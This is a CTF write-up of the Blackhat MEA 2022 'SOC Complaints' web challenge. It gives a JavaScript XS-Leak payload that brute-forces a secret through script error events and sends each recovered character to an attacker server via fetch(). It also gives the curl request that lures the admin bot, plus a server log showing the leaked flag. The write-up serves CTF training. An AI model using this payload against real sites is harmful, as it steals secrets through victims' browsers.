Diefunction
  • About
  • Vulnerabilities
    • GHSL-2021-023 / CVE-2021-32819
  • BlachatMEA Finals 2024
  • CTF
    • Technology Control Company
      • Athackcon CTF 2021
        • Trust
        • Config
        • Extend
        • Poison
      • Blackhat MEA 2022
        • CTF Setup on Kali linux
        • Careers
        • SOC Complaints
    • Athackcon
      • POLL
    • Cyber Night 3
      • Client Hell
    • BlackHatMEA Quals 2022
      • Spatify
      • PeehPee
      • Meme generator
      • Black notes
      • Jimmy's blog
    • BlackHatMEA Quals 2023
      • Web - Hardy
      • Web - Authy
      • Reverse engineering - light up the server
    • BlackhatMEA Finals 2024
      • PWN
    • BITSCTF - Reverse Mishap
    • Cybernights 2025
      • REVERSE
      • PWN
    • BYUCTF 2025
      • PWN
Powered by GitBook
On this page
  • Description
  • Structure
  • Solution
  • Exploit
  • Explanation

Was this helpful?

  1. CTF
  2. Technology Control Company
  3. Blackhat MEA 2022

SOC Complaints

PreviousCareersNextAthackcon

Last updated 2 years ago

Was this helpful?

IPAddress 172.20.0.4 Port 80 URL

Description

If you cannot access a website, complain to the SOC team then the SOC team will investigate.

Structure

.
├── app.js
├── config
│   └── cors.js
├── controllers
│   ├── complaints.js
│   └── manage.js
├── middlewares
│   └── error.js
├── package.json
├── routes
│   ├── complaints.js
│   └── manage.js
├── utils
│   ├── browser.js
│   └── database.js
└── views

Solution

Exploit

Attacker IPAddress

ip addr show docker0
6: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:40:01:c8:b5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:40ff:fe01:c8b5/64 scope link 
       valid_lft forever preferred_lft forever

IPv4: 172.17.0.1

Start a webserver on docker interface via python

python3 -m http.server 80 -b 172.17.0.1

Content of index.html

<html>
    <head>
        <title>EXPLOIT</title>
    </head>
    <body>
        <script>
            var alphabets = ' !"#$&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^`{|}~';
            var counter = 0;
            var secret = '';

            probeError = (url) => {
                let script = document.createElement('script');
                script.src = url;
                script.onload = async () => { 
                    secret = decodeURIComponent(url.split('?')[1].split('&')[1].split('=')[1]);
                    await fetch(`http://172.17.0.1/${secret}`);
                    counter = 0;
                    
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                script.onerror = () => {
                    counter = counter + 1;
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                document.head.appendChild(script);
            }
            probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);

        </script>
    </body>
</html>

Phish the SOC team

curl -X POST -H 'Content-type: application/json' -d '{"url": "http://172.17.0.1/"}' http://172.20.0.4/api/v1/complaints/
{"message":"your request was successfully submitted"}

Flag

└─$ python3 -m http.server 80 -b 172.17.0.1
Serving HTTP on 172.17.0.1 port 80 (http://172.17.0.1:80/) ...
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET / HTTP/1.1" 200 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC%7B HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-E HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-EN HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENO HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOU HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUG HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH%7D HTTP/1.1" 404 -

Explanation

http://172.20.0.4/
Error Events
Leaky Images: Targeted Privacy Attacks in the Web